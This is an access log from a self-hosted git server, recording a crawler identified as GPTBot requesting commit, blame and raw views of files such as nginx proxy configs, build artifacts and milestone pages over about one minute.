"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore" -[17/Feb/2026:15:30:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 11555] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fPYZ-00.toc" [Client 74.7.227.38] [Length 30318] [Gzip 11.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:15:30:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fPKG-00.toc" [Client 74.7.227.38] [Length 21919] [Gzip 5.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:15:30:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 2430] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:15:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 12488] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:15:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:15:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 15117] [Gzip 8.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:15:30:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2flocalpycs" [Client 74.7.227.38] [Length 24670] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:15:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2fwarn-GoldMonitor.txt" [Client 74.7.227.38] [Length 25199] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" -[17/Feb/2026:15:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2fwarn-AssetPilot.txt" [Client 74.7.227.38] [Length 25164] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" -[17/Feb/2026:15:31:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2flocalpycs" [Client 74.7.227.38] [Length 24634] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:15:31:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 10422] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:15:31:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:15:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2fbase_library.zip" [Client 74.7.227.38] [Length 20842] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip" -[17/Feb/2026:15:31:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2flocalpycs" [Client 74.7.227.38] [Length 24686] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:15:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fPYZ-00.pyz" [Client 74.7.227.38] [Length 18042] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:15:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fEXE-00.toc" [Client 74.7.227.38] [Length 23347] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:15:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2flocalpycs" [Client 74.7.227.38] [Length 24629] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:15:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 11749] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:15:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13159] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts" -[17/Feb/2026:15:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts" -[17/Feb/2026:15:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/PostgresWatchdog.spec?display=source" [Client 74.7.227.38] [Length 12256] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:15:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/PostgresWatchdog.spec?display=source" [Client 74.7.227.38] [Length 12258] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:15:31:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log?display=rendered" [Client 74.7.227.38] [Length 10995] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log" -[17/Feb/2026:15:31:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=mostcomplete&state=open" [Client 74.7.227.38] [Length 8509] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones" -[17/Feb/2026:15:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=leastcomplete&state=open" [Client 74.7.227.38] [Length 8503] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones" -[17/Feb/2026:15:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=closestduedate&state=open" [Client 74.7.227.38] [Length 8498] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones" -[17/Feb/2026:15:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=closestduedate&state=open" [Client 74.7.227.38] [Length 8500] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones" -[17/Feb/2026:15:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=html%2fstatus.json" [Client 74.7.227.38] [Length 18207] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" -[17/Feb/2026:15:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 9921] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" -[17/Feb/2026:15:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 11013] [Gzip 4.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" -[17/Feb/2026:15:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 962] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" -[17/Feb/2026:15:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 12724] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host" -[17/Feb/2026:15:31:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 13655] [Gzip 9.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:15:31:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 12733] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host" -[17/Feb/2026:15:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 13849] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host" -[17/Feb/2026:15:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 12940] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host" -[17/Feb/2026:15:31:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 12971] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host" -[17/Feb/2026:15:31:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 12761] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host" -[17/Feb/2026:15:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 12973] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host" -[17/Feb/2026:15:31:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 12765] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host" -[17/Feb/2026:15:31:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 11560] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html?display=rendered" [Client 74.7.227.38] [Length 14201] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" -[17/Feb/2026:15:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 12455] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:15:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:15:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 12472] [Gzip 7.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:15:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 2430] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:15:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 15057] [Gzip 8.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:15:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 1445] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:15:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 1140] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:15:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 12798] [Gzip 7.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 